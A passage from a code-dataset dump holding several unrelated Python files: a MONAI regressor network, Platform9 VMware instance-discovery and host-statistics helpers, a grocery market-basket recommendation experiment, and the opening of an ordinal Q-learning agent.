layers\n dropout: optional float value in range [0, 1] stating dropout probability for layers, None for no dropout\n bias: boolean stating if convolution layers should have a bias component\n \"\"\"\n super().__init__()\n\n self.in_channels, *self.in_shape = ensure_tuple(in_shape)\n self.dimensions = len(self.in_shape)\n self.channels = ensure_tuple(channels)\n self.strides = ensure_tuple(strides)\n self.out_shape = ensure_tuple(out_shape)\n self.kernel_size = ensure_tuple_rep(kernel_size, self.dimensions)\n self.num_res_units = num_res_units\n self.act = act\n self.norm = norm\n self.dropout = dropout\n self.bias = bias\n self.net = nn.Sequential()\n\n echannel = self.in_channels\n\n padding = same_padding(kernel_size)\n\n self.final_size = np.asarray(self.in_shape, np.int)\n self.reshape = Reshape(*self.out_shape)\n\n # encode stage\n for i, (c, s) in enumerate(zip(self.channels, self.strides)):\n layer = self._get_layer(echannel, c, s, i == len(channels) - 1)\n echannel = c # use the output channel number as the input for the next loop\n self.net.add_module(\"layer_%i\" % i, layer)\n self.final_size = calculate_out_shape(self.final_size, kernel_size, s, padding)\n\n self.final = self._get_final_layer((echannel,) + self.final_size)\n\n def _get_layer(\n self, in_channels: int, out_channels: int, strides: int, is_last: bool\n ) -> Union[ResidualUnit, Convolution]:\n \"\"\"\n Returns a layer accepting inputs with `in_channels` number of channels and producing outputs of `out_channels`\n number of channels. The `strides` indicates downsampling factor, ie. convolutional stride. If `is_last`\n is True this is the final layer and is not expected to include activation and normalization layers.\n \"\"\"\n\n layer: Union[ResidualUnit, Convolution]\n\n if self.num_res_units > 0:\n layer = ResidualUnit(\n subunits=self.num_res_units,\n last_conv_only=is_last,\n dimensions=self.dimensions,\n in_channels=in_channels,\n out_channels=out_channels,\n strides=strides,\n kernel_size=self.kernel_size,\n act=self.act,\n norm=self.norm,\n dropout=self.dropout,\n bias=self.bias,\n )\n else:\n layer = Convolution(\n conv_only=is_last,\n dimensions=self.dimensions,\n in_channels=in_channels,\n out_channels=out_channels,\n strides=strides,\n kernel_size=self.kernel_size,\n act=self.act,\n norm=self.norm,\n dropout=self.dropout,\n bias=self.bias,\n )\n\n return layer\n\n def _get_final_layer(self, in_shape: Sequence[int]):\n linear = nn.Linear(int(np.product(in_shape)), int(np.product(self.out_shape)))\n return nn.Sequential(nn.Flatten(), linear)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self.net(x)\n x = self.final(x)\n x = self.reshape(x)\n return x\n","sub_path":"monai/networks/nets/regressor.py","file_name":"regressor.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"333696869","text":"# vim: tabstop=6 shiftwidth=4 softtabstop=4\n# Copyright (c) 2014 Platform9 Systems Inc.\n\n\"\"\"\nImplements get_instance_info and related functions which are used in\ninstance discovery for vmware ESX/vCenter\n\"\"\"\nfrom datetime import timedelta, datetime\nfrom oslo_vmware import exceptions as vexc\nfrom oslo_config import cfg\nfrom netaddr import IPAddress\nfrom nova import exception\nfrom oslo_log import log as logging\nfrom oslo_vmware import vim_util as oslo_vutil\nfrom nova.virt.vmwareapi import constants\nfrom nova.virt.vmwareapi import vim_util\nfrom nova.virt.vmwareapi import vm_util\nfrom nova.compute import power_state\nfrom nova.virt import resource_types\nfrom nova.virt.vmwareapi import vm_queries_pf9\n\nimport nova.virt\nimport vmops\nimport host_statistics_pf9\n\npf9_opts_group = cfg.OptGroup(name='PF9')\npf9_opts = [\n cfg.StrOpt(name='ignore_folders', default='pf9_cinder_volumes',\n help='All VMs under the specified folders will only be logged '\n 'and not reported. Comma separated value.')\n]\n\nCONF = cfg.CONF\nCONF.register_group(pf9_opts_group)\nCONF.register_opts(pf9_opts, group=pf9_opts_group)\n\n\nLOG = logging.getLogger(__name__)\n\n# local cache of uuid->vm_ref\n# Reason for keeping this cache in this file and not in driver is to make this\n# cache accessible to calls from vmops.py\n_vm_cache = dict()\n_cache_refresh_interval = timedelta(minutes=10)\n_last_cache_clear_time = None\n\n# partial discovery IAAS-3987:\n# for get_network_information_from_vcenter. This is cached as the function\n# may be called as often as once per minute, straining vCenter.\n_network_vm_cache = None\n\nchange_units = {\n # CPU and memory usage percentages are already in correct format\n resource_types.CPU: lambda val: val,\n resource_types.MEMORY: lambda val: val,\n\n # Total packets send in 1000s of packets\n resource_types.NETWORK_SENT_PKTS: lambda val: val / 1000.0,\n resource_types.NETWORK_RECV_PKTS: lambda val: val / 1000.0,\n\n # network rates reported as KBPS, converting to MBPS\n resource_types.NETWORK_SEND_RATE: lambda val: val / 1000.0,\n resource_types.NETWORK_RECV_RATE: lambda val: val / 1000.0,\n\n # Disk capacity reported in bytes, converting to GB\n resource_types.DISK_USED: lambda val: 1.0 * val / 1024 ** 3,\n resource_types.DISK_TOTAL: lambda val: 1.0 * val / 1024 ** 3\n}\n\nvmware_to_resource_type = {\n 'mem.usage.average': resource_types.MEMORY,\n 'cpu.usage.average': resource_types.CPU,\n 'net.received.average': resource_types.NETWORK_RECV_RATE,\n 'net.transmitted.average': resource_types.NETWORK_SEND_RATE,\n 'net.packetsRx.summation': resource_types.NETWORK_RECV_PKTS,\n 'net.packetsTx.summation': resource_types.NETWORK_SENT_PKTS,\n 'disk.usage': resource_types.DISK_USED,\n 'disk.capacity': resource_types.DISK_TOTAL\n}\n\nresource_type_to_vmware = {\n resource_types.MEMORY: 'mem.usage.average',\n resource_types.CPU: 'cpu.usage.average',\n resource_types.NETWORK_RECV_RATE: 'net.received.average',\n resource_types.NETWORK_SEND_RATE: 'net.transmitted.average',\n resource_types.NETWORK_RECV_PKTS: 'net.packetsRx.summation',\n resource_types.NETWORK_SENT_PKTS: 'net.packetsTx.summation',\n resource_types.DISK_USED: 'disk.usage',\n resource_types.DISK_TOTAL: 'disk.capacity'\n}\n\nresources_available_at_respool = [\n resource_types.CPU,\n resource_types.MEMORY\n]\n\n\ndef get_hostname(driver):\n host_objs = driver._session._call_method(vim_util, \"get_objects\",\n \"HostSystem\", [\"name\"])\n host = None\n if host_objs:\n for host_obj in host_objs.objects:\n host = host_obj.obj\n break\n\n return driver._session._call_method(oslo_vutil, \"get_object_property\",\n host, \"name\")\n\n\ndef get_all_ip_addr(driver):\n return [{'interface_name': \"vCenter IP\",\n 'ip': driver._host_ip}]\n\n\ndef get_host_stats_esx(driver, res_types):\n \"\"\"\n Return currently known physical resource consumption\n :param res_types: An array of resources to be queried\n \"\"\"\n res_to_be_queried = [resource_type_to_vmware[x] for x in res_types]\n\n host_objs = driver._session._call_method(vim_util, \"get_objects\",\n \"HostSystem\", [\"name\"])\n # ESX will have only 1 host\n host = host_objs.objects[0].obj\n\n # Get information from all performance counters\n reqd_counter_information = driver._session._call_method(\n vim_util, \"get_esx_properties_pf9\", host, res_to_be_queried, None)\n return _get_stats_from_vmw_stats(reqd_counter_information)\n\n\ndef get_host_stats_vc(driver, res_types, node_name):\n \"\"\"\n Return aggregated stats for the given node (cluster)\n \"\"\"\n cluster_mor = driver._cluster_ref\n data_store_refs = _get_datastores_for_cluster(driver, cluster_mor, driver._datastore_regex)\n\n # Commenting the code so as to make sure we remove get_vc_properties_pf9\n # from vim_util when cleaning up this file as a part of IAAS-1778\n # get hosts under the VC\n #hosts = []\n #host_objs = driver._session._call_method(vim_util, \"get_objects\",\n # \"HostSystem\", [\"name\"])\n #for host_obj in host_objs.objects:\n # hosts.append(host_obj.obj)\n\n #vc_stats = driver._session._call_method(\n # vim_util, \"get_vc_properties_pf9\", res_pools, data_store_refs, hosts, res_types, None)\n\n vc_stats = {}\n # Net stats are not being used currently, also we are currently avoiding\n # the use of performance manager to get network stats since it is quite\n # resource and time consuming.\n # TODO: Revisit the performance manager logic to fetch network statistics\n # FIXME: IAAS-1875\n vc_stats['net.transmitted.average'] = 0\n vc_stats['net.received.average'] = 0\n vc_stats['net.packetsRx.summation'] = 0\n vc_stats['net.packetsTx.summation'] = 0\n datastore_stats = host_statistics_pf9.get_datastore_usage_stats(\n driver._session, data_store_refs)\n cluster_stats = host_statistics_pf9.get_cluster_usage_and_percentage(\n driver._session, cluster_mor)\n vc_stats['cpu.usage.average'] = 0 if cluster_stats['total_cpu'] == 0 else \\\n cluster_stats['used_cpu'] * 100.0 / cluster_stats['total_cpu']\n vc_stats['mem.usage.average'] = 0 if cluster_stats['total_memory'] == 0 else \\\n cluster_stats['used_memory'] * 100.0 / cluster_stats['total_memory']\n vc_stats['disk.capacity'] = datastore_stats['total_capacity']\n vc_stats['disk.usage'] = datastore_stats['total_used']\n\n return _get_stats_from_vmw_stats(vc_stats)\n\n\ndef _get_stats_from_vmw_stats(stats):\n keys = stats.keys()\n return_stats = dict()\n for key in keys:\n val = stats.get(key)\n return_stats[vmware_to_resource_type[key]] = \\\n _get_avg(vmware_to_resource_type[key], val)\n return return_stats\n\n\ndef _get_avg(key, values):\n if not isinstance(values, list):\n values = [values]\n total = sum(values)\n total = 1.0 * total / len(values)\n return change_units[key](total)\n\n\ndef get_all_networks(driver):\n \"\"\"\n Gets a mapping of IP addresses, MAC addresses and networks connected\n \"\"\"\n network_list = []\n datacenter_refs = []\n all_networks = []\n datacenters = driver._session._call_method(\n vim_util, \"get_objects\", \"Datacenter\", [\"name\"])\n for datacenter in datacenters.objects:\n datacenter_refs.append(datacenter.obj)\n\n for datacenter_ref in datacenter_refs:\n all_networks.append(driver._session._call_method(\n oslo_vutil, \"get_object_property\",\n datacenter_ref, \"network\"))\n\n for dc_specific_network in all_networks:\n # In cases where the datacenter has no networks, the previous driver call returns\n # an empty array element. Wrap in try-catch to allow for such cases, and continue\n try:\n for network in dc_specific_network[0]:\n if network['_type'] == \"Network\":\n network_name = driver._session._call_method(\n oslo_vutil, \"get_object_property\",\n network, \"name\")\n #TODO: network uuid needs to maintained along with names to\n # differentiate between them\n if {'bridge': network_name} not in network_list:\n network_list.append({'bridge': network_name})\n else:\n LOG.info(\"Ignoring network having [%s] type\" %\n network['_type'])\n except IndexError:\n LOG.info(\"Encountered a datacenter with no associated network, ignoring\")\n\n return network_list\n\n\ndef get_all_cluster_networks(driver, node=None):\n \"\"\"\n Gets a list of all networks connected to the authorized clusters\n \"\"\"\n network_moids = set()\n network_list = []\n\n assert isinstance(driver, nova.virt.vmwareapi.VMwareVCDriver)\n\n cluster_mors = [driver._cluster_ref]\n for cluster_mor in cluster_mors:\n network_mors = driver._session._call_method(oslo_vutil,\n \"get_object_property\",\n cluster_mor, \"network\")\n if not network_mors:\n LOG.warn(\"No networks detected under {cls_mor} cluster\".format(\n cls_mor=str(cluster_mor)))\n return network_list\n for network_mor in network_mors.ManagedObjectReference:\n if not network_mor.value in network_moids:\n network_moids.add(network_mor.value)\n network_name = driver._session._call_method(\n oslo_vutil, \"get_object_property\",\n network_mor, \"name\")\n network_list.append({'bridge': network_name})\n\n return network_list\n\n\n# NOT USED\ndef get_all_ip_mappings(driver):\n vm_network_info = dict()\n all_vms = _get_vms_and_uuids(driver)\n vm_id_ref = dict()\n\n for vm in all_vms.objects:\n for prop in vm.propSet:\n if prop.name == \"summary.config.instanceUuid\":\n vm_id_ref[prop.val] = vm.obj\n\n for (uuid, vm_ref) in vm_id_ref.items():\n # TODO: IAAS-763\n guest_nics_info = driver._session._call_method(\n oslo_vutil, \"get_object_property\", vm_ref, \"guest.net\")\n if guest_nics_info:\n for nic_info in guest_nics_info.GuestNicInfo:\n ip_addresses = nic_info['ipAddress'] \\\n if hasattr(nic_info, 'ipAddress') else None\n mac_address = nic_info['macAddress'] \\\n if hasattr(nic_info, 'macAddress')else None\n network_name = nic_info['network'] \\\n if hasattr(nic_info, 'network') else None\n if not vm_network_info.get(uuid):\n vm_network_info[uuid] = []\n # select ipv4 if available, otherwise select first ip present\n ip_address = None\n if ip_addresses is not None:\n for ip in ip_addresses:\n if ip.find(\":\") == -1:\n ip_address = ip\n break\n if ip_address is None:\n ip_address = ip_addresses[0]\n\n vm_network_info[uuid].append({'ip_address': ip_address,\n 'mac_address': mac_address,\n 'bridge': network_name})\n else:\n vm_network_info[uuid] = []\n return vm_network_info\n\n\ndef get_vms_on_vcenter(driver, node=None):\n \"\"\"\n Generator for getting all VMs that are of interest to the driver.\n The VMs returned by this method are already filtered based on datastore and\n cluster they belong to.\n The VM object returned contains the vm ref alongwith following properties -\n 1. name\n 2. runtime.connectionState\n 3. summary.config.vmPathName\n 4. summary.config.instanceUuid\n 5. resourcePool\n 6. parent\n How to use this function for getting other properties -\n for vm in get_all_vms_on_vcenter(driver):\n vm_ref = vm.obj\n # Use vm_ref to call get_dynamic_properties and\n # get other properties as needed\n Note:\n 1. This method will return templates as well\n 2. to get properties listed above you need to iterate over vm.propSet\n 3. This method will return **NOT** any VM that are under the folders\n specified in ignore_folders in nova.conf\n \"\"\"\n global _vm_cache\n folder_ref_name = dict()\n res_pools_to_look_for = [x.value for x in vm_queries_pf9._get_res_pool_obj_list(driver, node)]\n folders_to_ignore = [x.strip() for x in CONF.PF9.ignore_folders.split(',')]\n for vm in vm_queries_pf9._get_all_vms(driver):\n uuid = None\n conn_state = None\n datastore = None\n vm_path = None\n resource_pool = None\n folder_ref = None\n vm_name = None\n for prop in vm.propSet:\n if prop.name == \"runtime.connectionState\":\n conn_state = prop.val\n elif prop.name == 'summary.config.vmPathName':\n vm_path = prop.val\n datastore = vm_path[vm_path.find('[')+1:vm_path.find(']')]\n elif prop.name == \"resourcePool\":\n resource_pool = prop.val.value\n elif prop.name == 'summary.config.instanceUuid':\n uuid = prop.val\n elif prop.name == 'parent':\n folder_ref = prop.val\n elif prop.name == 'name':\n vm_name = prop.val\n\n if folder_ref not in folder_ref_name:\n folder_ref_name[folder_ref] = driver._session._call_method(\n oslo_vutil, \"get_object_property\", folder_ref, \"name\")\n\n folder_name = folder_ref_name[folder_ref]\n\n # Ignoring the orphaned or inaccessible VMs\n # Ignoring templates\n # Ignoring VMs from other datastores\n if conn_state in ['orphaned', 'inaccessible']:\n LOG.warn('Ignoring VM [{0}] with connection state '\n '[{1}]'.format(uuid, conn_state))\n continue\n if driver._datastore_regex and \\\n not driver._datastore_regex.match(datastore):\n continue\n\n if folder_name in folders_to_ignore:\n # Ignore VMs in folders that are specified \"ignore_folders\"\n # in nova.conf\n LOG.info('Ignoring VM {name} as per config'.format(name=vm_name))\n continue\n\n if vm_path[-4:] == 'vmtx':\n _vm_cache[uuid] = vm.obj\n yield vm\n else:\n if resource_pool and resource_pool in res_pools_to_look_for:\n _vm_cache[uuid] = vm.obj\n yield vm\n\n\ndef list_instance_uuids_on_vcenter(driver, node=None, template_uuids=None):\n \"\"\"\n All list functions need to call the vsphere APIs since the information\n returned by list functions should always be in sync with hypervisor.\n local cache will be refreshed in this call.\n Note: Parameter template_uuids if not None, will be populated with the\n template UUIDs returned by vcenter. If None, templates will be skipped.\n \"\"\"\n global _vm_cache\n global _last_cache_clear_time\n global _cache_refresh_interval\n current_time = datetime.now()\n if _last_cache_clear_time is None \\\n or current_time - _last_cache_clear_time >= _cache_refresh_interval:\n # to prevent subsequent calls for VMs on multiple nodes from\n # clearing the cache\n _vm_cache.clear()\n _last_cache_clear_time = datetime.now()\n uuid_list = []\n for vm in get_vms_on_vcenter(driver, node):\n uuid = None\n path = None\n for prop in vm.propSet:\n if prop.name == \"summary.config.instanceUuid\":\n uuid = prop.val\n elif prop.name == \"summary.config.vmPathName\":\n path = prop.val\n if uuid and path:\n break\n if path[-4:] == 'vmtx':\n if template_uuids is not None:\n template_uuids.append(uuid)\n else:\n uuid_list.append(uuid)\n return uuid_list\n\n\ndef _get_res_pools_for_cluster(driver, cluster_name):\n \"\"\"\n Gets all the resource pools belonging to the given cluster\n \"\"\"\n res_pools = []\n res_pool_objects = driver._session._call_method(vim_util, \"get_objects\",\n \"ResourcePool\", ['owner'])\n\n for res_pool_obj in res_pool_objects.objects:\n for prop in res_pool_obj.propSet:\n if prop.name == 'owner' and prop.val.value in cluster_name:\n res_pools.append(res_pool_obj.obj)\n\n return res_pools\n\n\ndef _get_datastores_for_cluster(driver, cluster_mor, datastore_regex):\n \"\"\"\n Gets all the datastores associated with the given custer that match\n the datastore regex\n \"\"\"\n datastore_ret = driver._session._call_method(\n oslo_vutil, \"get_object_property\", cluster_mor, \"datastore\")\n if not datastore_ret:\n return []\n data_stores = driver._session._call_method(\n vim_util, \"get_properties_for_a_collection_of_objects\",\n \"Datastore\", datastore_ret.ManagedObjectReference,\n [\"summary.name\"])\n\n data_store_refs = []\n for obj_content in data_stores.objects:\n propdict = vm_util.propset_dict(obj_content.propSet)\n if datastore_regex is None or \\\n datastore_regex.match(propdict['summary.name']):\n data_store_refs.append(obj_content.obj)\n\n return data_store_refs\n\n\ndef _get_vms_and_uuids(driver):\n \"\"\"\n Get the VM object reference along with name and UUID for all the VMs\n associated with given connection object(driver)\n \"\"\"\n return driver._session._call_method(\n vim_util, \"get_objects\", \"VirtualMachine\",\n [\"name\", \"summary.config.instanceUuid\"])\n","sub_path":"virt/vmwareapi/vm_utils_pf9.py","file_name":"vm_utils_pf9.py","file_ext":"py","file_size_in_byte":18019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"440807482","text":"import pandas as pd\nfrom mlxtend.frequent_patterns import apriori\nfrom mlxtend.frequent_patterns import association_rules\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport math\nimport re\n\ndata_path = \"E:\\Projects\\MBA_retail\\\\tmp\"\nN_clusters = 4\n\ndef get_train_data():\n data_path_train = 'E:\\Data\\kaggle'\n prior = pd.read_csv('{0}/order_products__train.csv'.format(data_path_train))\n products = pd.read_csv('{0}/products.csv'.format(data_path_train))\n aisles = pd.read_csv('{0}/aisles.csv'.format(data_path_train))\n orders = pd.read_csv('{0}/orders.csv'.format(data_path_train))\n mt = pd.merge(prior, products, on=['product_id', 'product_id'])\n mt = pd.merge(mt, aisles, on=['aisle_id', 'aisle_id'])\n mt = pd.merge(mt, orders, on=['order_id', 'order_id'])\n\n mt_sort = mt['aisle'].value_counts()\n print(mt_sort.head())\n\n cust_prod = pd.crosstab(mt['order_id'], mt['aisle']) # user_id\n return cust_prod\n\ndef get_clients():\n data_path_train = 'E:\\Data\\kaggle'\n prior = pd.read_csv('{0}/order_products__prior.csv'.format(data_path_train))\n prior = prior[:50000]\n products = pd.read_csv('{0}/products.csv'.format(data_path_train))\n aisles = pd.read_csv('{0}/aisles.csv'.format(data_path_train))\n orders = pd.read_csv('{0}/orders.csv'.format(data_path_train))\n mt = pd.merge(prior, products, on=['product_id', 'product_id'])\n mt = pd.merge(mt, aisles, on=['aisle_id', 'aisle_id'])\n mt = pd.merge(mt, orders, on=['order_id', 'order_id'])\n\n mt_sort = mt['aisle'].value_counts()\n\n cust_prod = pd.crosstab(mt['order_id'], mt['aisle']) # user_id\n\n data_lbl = mt[['aisle_id', 'aisle']]\n\n df1 = mt[['order_id', 'aisle', 'aisle_id']]\n df1 = df1.sort_values(by=['order_id'])\n df = df1.as_matrix()\n\n N = len(cust_prod)\n clients_aisle = []\n clients_aisle_id = []\n tmp_array = [df[0][1]]\n tmp_array_id = [df[0][2]]\n\n for i in range(1, N):\n if (df[i][0] == df[i - 1][0]):\n tmp_array.append(df[i][1])\n tmp_array_id.append(df[i][2])\n\n else:\n clients_aisle.append(tmp_array)\n clients_aisle_id.append(tmp_array_id)\n\n tmp_array = [df[i][1]]\n tmp_array_id = [df[i][2]]\n\n print('clients - ok')\n return clients_aisle, clients_aisle_id, data_lbl, cust_prod\n\ndef matrix_cosine(file_path):\n\n data = pd.read_csv(file_path)\n data_matrix = data.as_matrix()\n\n N = len(data_matrix[0])\n\n Matrix_cos = [[0 for x in range(N)] for y in range(N)]\n for i in range(N):\n for j in range(i, N):\n i_i = data_matrix[:, i]\n j_j = data_matrix[:, j]\n cosine = distCosine(i_i, j_j)\n Matrix_cos[i][j] = cosine\n Matrix_cos[j][i] = cosine\n return Matrix_cos\n\ndef get_products(clients, rules, flag):\n # flag = 0: return list of recommendation\n # flag = 1: return confidence\n # flag = 2: return item\n buy = []\n x_data = rules['antecedants'].tolist()\n x_data = [list(_x) for _x in x_data]\n y_data = rules['consequents'].tolist()\n y_data = [list(_y) for _y in y_data]\n N = len(rules)\n recommendation_full = []\n recommendation = []\n prob = []\n for rule in x_data:\n\n if np.array_equal(rule, clients):\n add = y_data[x_data.index(rule)]\n if add not in recommendation_full:\n recommendation_full.append(y_data[x_data.index(rule)])\n\n check = set(rule).issubset(set(clients))\n if (check):\n add = list(set(y_data[x_data.index(rule)]) - set(clients))\n if add != []:\n recommendation.append(add)\n prob.append(rules['confidence'][x_data.index(rule)])\n\n col_names = ['item', 'confidence']\n rec = pd.DataFrame(columns=col_names)\n for i in range(len(prob)):\n rec = rec.append({'item': recommendation[i], 'confidence': prob[i]}, ignore_index=True)\n rec = rec.sort_values(by=['confidence'], ascending=False)\n rec = rec.as_matrix()\n\n selected = []\n selected_2 = 0\n\n if recommendation_full != []:\n selected = recommendation_full\n else:\n if recommendation != []: # !!!!MAX\n # probs = np.array(prob)\n # probs = normalize(probs.reshape(1,-1), 'l1')[0]\n # selected_idx = np.random.choice(len(recommendation), 1, False, probs)[0]\n selected = rec[0][0] # recommendation[selected_idx]\n selected_2 = rec[0][1] # prob[selected_idx]\n\n # if random.random() < probs[selected_idx]:\n # print('!!!!!!!%%%!! ',selected)\n # buy.append(selected)\n recommendation = [item for sublist in recommendation for item in sublist]\n recommendation = list(set(recommendation))\n # recommendation = list((set(recommendation) - set(clients)))\n\n if (flag == 0):\n return recommendation\n if (flag == 1):\n return selected_2\n if (flag == 2):\n return selected\n\n\ndef distCosine(vecA, vecB):\n def dotProduct(vecA, vecB):\n d = np.multiply(vecA, vecB).sum()\n return d\n\n a = dotProduct(vecA, vecB)\n b = math.sqrt(dotProduct(vecA, vecA))\n c = math.sqrt(dotProduct(vecB, vecB))\n if (b == 0 or c == 0):\n return 0\n else:\n return a / b / c\n\n\ndef get_recommendation_cos(Matrix_cos, client, df_lbl):\n recommendation = []\n\n for i in client:\n a = list(Matrix_cos[i])\n m = -1\n for t in a:\n if t > m and t < 1.0:\n m = t\n r = a.index(m)\n # print(i, '->',r)\n if (r != 0):\n y = df_lbl.set_index(['aisle_id'])\n y = y.loc[r]\n y = y.as_matrix()\n recommendation.append(y[0][0])\n # print(y[0][0])\n # else:\n # recommendation.append('No Recommendation')\n # print('No Recommendation')\n return recommendation\n\n\ndef get_recommendation(client, recommendations, x_data, y_data, c_dat):\n col_names = ['antecedants', 'consequents', 'confidence']\n recommendation_rules = pd.DataFrame(columns=col_names)\n '''''''''''\n x_data = rules['antecedants'].tolist()\n x_data = [list(_x) for _x in x_data]\n\n y_data = rules['consequents'].tolist()\n y_data = [list(_y) for _y in y_data]\n c_data = rules['confidence'].tolist()\n '''\n N = len(x_data)\n for r in range(N):\n ch = list(set(client) & set(x_data[r]))\n ch2 = list(set(recommendations) & set(y_data[r]))\n if (ch != [] and ch2 != []):\n recommendation_rules = recommendation_rules.append(\n {'antecedants': x_data[r], 'consequents': y_data[r], 'confidence': c_data[r]}, ignore_index=True)\n # print(recommendation_rules.head())\n result_confidence = get_products(client, recommendation_rules, 1)\n return result_confidence\n\ndef parse_rules(rules, type):\n x_data = rules[type]\n x_data_r = []\n for x in x_data:\n x_d = x[10:len(x) - 1]\n x_d = re.sub(\"[{})(]\", \"\", x_d)\n t_ = ''\n for st in range(len(x_d)):\n if x_d[st] != \"'\" and x_d[st - 1] != ',':\n t_ += x_d[st]\n x_d = t_.split(',')\n x_data_r.append(x_d)\n return x_data_r\nif __name__ == \"__main__\":\n data_path = \"E:\\Projects\\MBA_retail\\\\tmp\"\n\n clients_aisle, clients_aisle_id, data_lbl, clients_matrix = get_clients()\n print(clients_aisle)\n print(clients_aisle_id)\n print(data_lbl)\n print('rules_start')\n rules_cluster_1 = pd.read_csv('{0}/rules_cluster_1.csv'.format(data_path))\n if (len(rules_cluster_1)>500000):\n rules_cluster_1 = rules_cluster_1[:500000]\n x_data_1 = parse_rules(rules_cluster_1,'antecedants')\n y_data_1 = parse_rules(rules_cluster_1,'consequents')\n c_data_1 = rules_cluster_1['confidence'].tolist()\n print('cluser 1 - rules')\n\n rules_cluster_2 = pd.read_csv('{0}/rules_cluster_2.csv'.format(data_path))\n if (len(rules_cluster_2)>500000):\n rules_cluster_2 = rules_cluster_2[:500000]\n x_data_2 = parse_rules(rules_cluster_2, 'antecedants')\n y_data_2 = parse_rules(rules_cluster_2, 'consequents')\n c_data_2 = rules_cluster_2['confidence'].tolist()\n print('cluster 2 - rules')\n\n rules_cluster_3 = pd.read_csv('{0}/rules_cluster_3.csv'.format(data_path))\n if (len(rules_cluster_3)>500000):\n rules_cluster_3 = rules_cluster_3[:500000]\n x_data_3 = parse_rules(rules_cluster_3, 'antecedants')\n y_data_3 = parse_rules(rules_cluster_3, 'consequents')\n c_data_3 = rules_cluster_3['confidence'].tolist()\n print('cluster 3 - rules')\n\n rules_cluster_4 = pd.read_csv('{0}/rules_cluster_4.csv'.format(data_path))\n if (len(rules_cluster_4)>500000):\n rules_cluster_4 = rules_cluster_4[:500000]\n x_data_4 = parse_rules(rules_cluster_4, 'antecedants')\n y_data_4 = parse_rules(rules_cluster_4, 'consequents')\n c_data_4 = rules_cluster_4['confidence'].tolist()\n print('cluster 4 - rules')\n\n print('rules')\n\n matrix_cluster_1 = matrix_cosine('{0}/train_cluster_1.csv'.format(data_path))\n matrix_cluster_2 = matrix_cosine('{0}/train_cluster_2.csv'.format(data_path))\n matrix_cluster_3 = matrix_cosine('{0}/train_cluster_3.csv'.format(data_path))\n matrix_cluster_4 = matrix_cosine('{0}/train_cluster_4.csv'.format(data_path))\n print('matrix')\n train_data = get_train_data()\n clusterer = KMeans(n_clusters=N_clusters).fit(train_data)\n\n number_clients = 300#len(clients_aisle)\n conf = []\n c_preds = clusterer.predict(clients_matrix)\n print('prediction')\n for c in range(number_clients):\n if (c_preds[c] == 0):\n Matrix_cos = matrix_cluster_1\n x_data = x_data_1\n y_data = y_data_1\n c_data = c_data_1\n if (c_preds[c] == 1):\n Matrix_cos = matrix_cluster_2\n rules = rules_cluster_2\n x_data = x_data_2\n y_data = y_data_2\n c_data = c_data_2\n if (c_preds[c] == 2):\n Matrix_cos = matrix_cluster_3\n x_data = x_data_3\n y_data = y_data_3\n c_data = c_data_3\n if (c_preds[c] == 3):\n Matrix_cos = matrix_cluster_4\n x_data = x_data_4\n y_data = y_data_4\n c_data = c_data_4\n\n print('{0}/{1} - cluster{2} - rules = {3}'.format(c+1, number_clients, c_preds[c], len(x_data)))\n\n cos = get_recommendation_cos(Matrix_cos, clients_aisle_id[c], data_lbl)\n cos = list((set(cos) - set(clients_aisle[c])))\n print('len(cos)', len(cos))\n result = get_recommendation(clients_aisle[c], cos, x_data, y_data, c_data)\n print(result)\n conf.append(result)\n\n np.savetxt(\"tmp/confidence_clusters.csv\", conf, delimiter=\";\")","sub_path":"src/experiments/experiment_cluster_kaggle.py","file_name":"experiment_cluster_kaggle.py","file_ext":"py","file_size_in_byte":10711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"615515903","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport itertools\n\n\nclass QAgent:\n def __init__(self, alpha, gamma, epsilon, epsilon_min, n_actions, n_ordinals, n_observations, randomize):\n self.alpha = alpha\n self.gamma = gamma\n self.epsilon = epsilon\n self.epsilon_min = epsilon_min\n self.n_actions = n_actions\n self.n_ordinals = n_ordinals\n self.observation_space = self.init_observation_space()\n self.observation_to_index = self.build_obs_dict(self.observation_space)\n\n # Ordinal_Values (3-dimensional array with ordinal_value (array of floats) for each action in each observation)\n self.ordinal_values = np.full((n_observations, n_actions, n_ordinals), 0.0)\n\n self.win_rates = []\n self.average_rewards = []\n\n # Defines discrete observation space\n @staticmethod\n def init_observation_space():\n cart_pos_space = np.linspace(-2.4, 2.4, 10)\n cart_vel_space = np.linspace(-4, 4, 10)\n pole_theta_space = np.linspace(-0.20943951, 0.20943951, 10)\n pole_theta_vel_space = np.linspace(-4, 4, 10)\n return [cart_pos_space, cart_vel_space, pole_theta_space, pole_theta_vel_space]\n\n @staticmethod\n def build_obs_dict(observation_space):\n # List of all possible discrete observations\n observation_range = [range(len(i) + 1) for i in observation_space]\n # Dictionary that maps discretized observations to array indices\n observation_to_index = {}\n index_counter = 0\n for observation in list(itertools.product(*observation_range)):\n observation_to_index[observation] = index_counter\n index_counter += 1\n return observation_to_index\n\n def update(self, prev_obs, prev_act, obs, reward, episode_reward, done):\n ordinal = self.reward_to_ordinal(reward, episode_reward, done)\n # update ordinal_values with received ordinal\n self.update_ordinal_values(prev_obs, prev_act, obs, ordinal)\n\n # Updates ordinal_values based on probability of ordinal reward occurrence for each action\n def update_ordinal_values(self, prev_obs, prev_act, obs, ordinal):\n greedy_action = self.get_greedy_action(obs)\n # reduce old data weight\n for i in range(self.n_ordinals):\n self.ordinal_values[prev_obs, prev_act, i] *= (1 - self.alpha)\n self.ordinal_values[prev_obs, prev_act, i] += self.alpha * (self.gamma * self.ordinal_values[obs, greedy_action, i])\n\n # add new data point\n self.ordinal_values[prev_obs, prev_act, ordinal] += self.alpha\n\n # Computes borda_values for one observation given the ordinal_values\n def compute_borda_scores(self, obs):\n # sum up all ordinal values per action for given observation\n ordinal_value_sum_per_action = np.zeros(self.n_actions)\n for action_a in range(self.n_actions):\n for ordinal_value in self.ordinal_values[obs, action_a]:\n ordinal_value_sum_per_action[action_a] += ordinal_value\n\n # count actions whose ordinal value sum is not zero (no comparision possible for actions without ordinal_value)\n non_zero_action_count = np.count_nonzero(ordinal_value_sum_per_action)\n actions_to_compare_count = non_zero_action_count - 1\n\n borda_scores = []\n # 